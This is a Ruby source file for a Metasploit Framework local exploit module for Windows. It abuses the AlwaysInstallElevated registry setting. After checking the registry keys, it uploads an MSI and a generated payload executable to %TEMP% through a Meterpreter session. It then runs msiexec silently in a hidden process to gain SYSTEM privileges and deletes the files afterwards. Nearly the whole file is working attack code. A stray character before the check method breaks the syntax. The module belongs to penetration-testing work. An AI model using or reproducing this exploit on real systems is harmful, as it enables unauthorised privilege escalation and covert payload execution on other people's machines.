## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # http://metasploit.com/ ## require 'msf/core' require 'rex' require 'msf/core/post/windows/registry' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking include Msf::Exploit::EXE include Msf::Post::Windows::Registry def initialize(info={}) super(update_info(info, { 'Name' => 'Windows AlwaysInstallElevated MSI', 'Description' => %q{ This module checks the AlwaysInstallElevated registry keys which dictate if .MSI files should be installed with elevated privileges (NT AUTHORITY\SYSTEM). The default MSI file is data/post/exec_payload.msi with the WiX source file under data/post/exec_payload_source/. This MSI simply executes payload.exe within the same folder. The MSI may not execute succesfully successive times. }, 'License' => MSF_LICENSE, 'Author' => [ 'Ben Campbell', 'Parvez Anwar' # discovery ], 'Arch' => [ ARCH_X86, ARCH_X86_64 ], 'Platform' => [ 'win' ], 'SessionTypes' => [ 'meterpreter' ], 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'thread', }, 'Targets' => [ [ 'Windows', { } ], ], 'References' => [ [ 'URL', 'http://www.greyhathacker.net/?p=185' ], [ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ], [ 'URL', 'http://wix.sourceforge.net'] , ], 'DisclosureDate'=> 'Mar 18 2010', 'DefaultTarget' => 0 })) register_advanced_options([ OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]), ], self.class) end s def check install_elevated = "AlwaysInstallElevated" installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer" hkcu = "HKEY_CURRENT_USER\\#{installer}" hklm = "HKEY_LOCAL_MACHINE\\#{installer}" local_machine_value = registry_getvaldata(hklm,install_elevated) if local_machine_value.nil? print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif local_machine_value == 0 print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.") current_user_value = registry_getvaldata(hkcu,install_elevated) if current_user_value.nil? print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.") return Msf::Exploit::CheckCode::Safe elsif current_user_value == 0 print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Safe else print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.") return Msf::Exploit::CheckCode::Vulnerable end end end def cleanup if @executed begin print_status("Deleting MSI...") session.fs.file.delete(@msi_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) end begin print_status("Deleting Payload...") session.fs.file.delete(@payload_destination) rescue Rex::Post::Meterpreter::RequestError => e print_error(e.to_s) end end end def exploit @executed = false if check == Msf::Exploit::CheckCode::Vulnerable @executed = true msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi" msi_source = ::File.join(Msf::Config.install_root, "data", "post", "exec_payload.msi") # Upload MSI @msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}" print_status("Uploading the MSI to #{@msi_destination} ...") session.fs.file.upload_file(@msi_destination, msi_source) # Upload payload payload = generate_payload_exe @payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe" print_status("Uploading the Payload to #{@payload_destination} ...") fd = client.fs.file.new(@payload_destination, "wb") fd.write(payload) fd.close # Execute MSI print_status("Executing MSI...") if datastore['LOG_FILE'].nil? logging = "" else logging = "/l* #{datastore['LOG_FILE']} " end cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}" vprint_status(cmd) session.sys.process.execute(cmd, nil, {'Hidden' => true}) select(nil, nil, nil, 5) end end end